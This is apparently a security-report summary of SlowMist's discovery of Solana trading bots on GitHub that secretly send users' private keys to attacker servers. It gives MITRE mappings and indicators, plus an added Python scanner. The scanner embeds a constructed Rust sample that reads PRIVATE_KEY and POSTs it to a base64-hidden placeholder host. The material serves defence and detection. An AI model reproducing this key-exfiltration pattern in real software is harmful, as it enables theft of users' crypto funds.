The SlowMist security team uncovered a crypto-stealing mechanism hidden within open-source Solana trading bots on GitHub that exfiltrate private keys to attacker-controlled servers. The attack exploits user trust in open-source projects by embedding malicious code that sends sensitive data silently upon execution. #Solana #pumpfun #SlowMist
Keypoints
- A malicious coin-stealing mechanism was found in the open-source GitHub projects zldp2002/solana-pumpfun-bot and audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot.
- The attack code is located in the configuration file src/common/config.rs, specifically in the create_coingecko_proxy() method.
- The malware retrieves the private key from the local .env file and exfiltrates it via a POST request to attacker-controlled endpoints.
- The attacker’s server IP address 103.35.189.28 (US-hosted) and the domain storebackend-qpq3.onrender.com (a Render-hosted backend) were identified as the endpoints receiving the stolen keys; the page labels them command and control nodes, but their observed role is exfiltration.
- Dynamic analysis confirmed that the malicious bot sends the private key to servers without alerting the victim, masking the activity by integrating legitimate functions.
- The GitHub repositories involved had recent updates replacing encoded attacker server addresses, indicating active maintenance of the malware.
- Users are urged not to run unknown open-source wallet tools with real keys, to review any code path that both reads the wallet key and makes outbound network requests before running a bot, and to test in a sandbox that holds no real private keys and whose outbound traffic is monitored.
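The pattern the keypoints describe (a function that reads the wallet key from the environment, hides the destination behind an encoded string, and sends the key out over HTTP under a benign-looking name) can be triaged statically before a bot is ever run. The script below is an added example and is not code from the SlowMist write-up or from the repositories it names; the embedded Rust snippet is constructed to mimic the described layout (an `import_env_var` helper, a price-proxy function that also POSTs the key, a base64-hidden URL), and the `exfil.example` host, function names and regexes are assumptions for illustration, not indicators from the report.

```python
"""Static triage for trojanized Rust trading bots (added example, not the page's code).

Flags functions that both read a secret from the environment and talk to the
network, and decodes base64 string literals that hide a URL or host.
"""
import base64
import json
import re
from pathlib import Path

# Environment variables a trading bot legitimately needs but must never send anywhere.
SECRET_ENV_NAMES = {"PRIVATE_KEY", "PRIVATE_KEYS", "WALLET_PRIVATE_KEY", "MNEMONIC", "SEED_PHRASE"}
# Env reads with a literal key name (std::env::var, dotenv, or a project helper like import_env_var).
ENV_READ_RE = re.compile(r'(?:env::var|import_env_var|dotenv::var)\s*\(\s*"([A-Z0-9_]+)"')
# Outbound network primitives commonly used from Rust.
HTTP_RE = re.compile(r"\.(?:post|put|get)\s*\(|reqwest::|ureq::|hyper::|TcpStream::connect")
FN_RE = re.compile(r"^\s*(?:pub(?:\([^)]*\))?\s+)?(?:async\s+)?fn\s+([A-Za-z_]\w*)", re.M)
# Quoted base64-looking literals long enough to hide a hostname.
B64_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
HOST_RE = re.compile(r"^(?:https?://|\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


def split_functions(src: str) -> list[tuple[str, str]]:
    """Return (name, body) pairs by brace-matching from each `fn` keyword."""
    out = []
    for m in FN_RE.finditer(src):
        start = src.find("{", m.end())
        if start < 0:
            continue
        depth = 0
        for i in range(start, len(src)):
            if src[i] == "{":
                depth += 1
            elif src[i] == "}":
                depth -= 1
                if depth == 0:
                    out.append((m.group(1), src[start:i + 1]))
                    break
    return out


def decode_hidden_hosts(src: str) -> list[tuple[str, str]]:
    """Decode base64 literals and keep those that decode to a URL, IP or hostname."""
    found = []
    for m in B64_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64, or binary: ignore
        if HOST_RE.search(text):
            found.append((m.group(1), text))
    return found


def triage_source(src: str) -> list[dict]:
    """Flag functions that read a secret env var and also reach the network."""
    findings = []
    for name, body in split_functions(src):
        secrets = {v for v in ENV_READ_RE.findall(body) if v in SECRET_ENV_NAMES}
        network = bool(HTTP_RE.search(body))
        hosts = [t for _, t in decode_hidden_hosts(body)]
        if secrets and (network or hosts):
            findings.append({"function": name, "secrets": sorted(secrets),
                             "network": network, "hidden_hosts": hosts})
    return findings


def triage_tree(root: Path) -> list[dict]:
    """Run triage_source over every .rs file under root, tagging findings with the path."""
    results = []
    for path in sorted(root.rglob("*.rs")):
        for f in triage_source(path.read_text(encoding="utf-8", errors="replace")):
            results.append({"file": str(path), **f})
    return results


# Constructed sample mimicking the described layout; the hidden URL is an assumed placeholder.
_HIDDEN_URL_B64 = base64.b64encode(b"https://exfil.example/collect").decode()
SAMPLE_RS = '''
use std::env;

pub fn import_env_var(key: &str) -> String {
    env::var(key).expect("missing env var")
}

pub fn rpc_client() -> String {
    let url = env::var("RPC_URL").unwrap();
    reqwest::blocking::get(&url).unwrap().text().unwrap()
}

pub fn sign_order(payload: &[u8]) -> Vec<u8> {
    let key = import_env_var("PRIVATE_KEY");
    sign(&key, payload)
}

pub async fn create_price_proxy() -> f64 {
    let price = fetch_price("https://api.coingecko.com/api/v3/simple/price").await;
    let key = import_env_var("PRIVATE_KEY");
    let endpoint = String::from_utf8(base64::decode("__HIDDEN__").unwrap()).unwrap();
    let _ = reqwest::Client::new().post(&endpoint).json(&serde_json::json!({ "key": key })).send().await;
    price
}
'''.replace("__HIDDEN__", _HIDDEN_URL_B64)

if __name__ == "__main__":
    print(json.dumps(triage_source(SAMPLE_RS), indent=2))
```

Run it against a checked-out repository with `triage_tree(Path("path/to/bot"))`; only `create_price_proxy` is reported for the sample, because `rpc_client` reads a non-secret and `sign_order` reads the key without touching the network. A hit is a reason to read the function, not proof of theft, and a clean result is not a guarantee: the check is line-based and will miss keys passed through intermediate variables or obfuscation beyond plain base64, which is why the sandbox-and-egress-monitoring advice above still applies.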
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The page maps key theft to this technique: the Rust create_coingecko_proxy() function initiates the theft and the HTTP POST exfiltration (‘create_coingecko_proxy() method sends a JSON payload embedding the private key to the attacker’s server’). Note that the payload is compiled Rust run by the victim rather than an interpreted script, so T1204.002 (User Execution: Malicious File) and T1195 (Supply Chain Compromise) describe the delivery more precisely.
- [T1552] Unsecured Credentials – The malware reads PRIVATE_KEY from the local .env file through the bot’s own import_env_var() helper; the bot legitimately needs the key for trading, so the malicious code simply reuses a plaintext credential that is already in reach (‘Sensitive data such as the PRIVATE_KEY is stored in the .env file’).
- [T1071] Application Layer Protocol – The attacker uses HTTP POST requests to exfiltrate stolen private keys to their server (‘sends it via a POST request to the attacker’s server’).
- [T1036] Masquerading – Malicious functionality is disguised as a legitimate price retrieval feature, and misleading method names hide the true intent (‘create_coingecko_proxy() method includes legitimate-looking functionality such as price retrieval, which helps mask its malicious intent’).
Indicators of Compromise
- [IP Addresses] Attacker’s exfiltration server – 103.35.189.28
- [Domains] Malicious backend server domain – storebackend-qpq3.onrender.com
- [File Hashes] Malicious project files – 07f0364171627729788797bb37e0170a06a787a479666abf8c80736722bb79e8 (pumpfun-pumpswap-sniper-copy-trading-bot-master.zip), ace4b1fc4290d6ffd7da0fa943625b3a852190f0aa8d44b93623423299809e48 (pumpfun-pumpswap-sniper-copy-trading-bot-master/src/common/config.rs)
- [Repositories] Malicious GitHub repository – https://github.com/audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot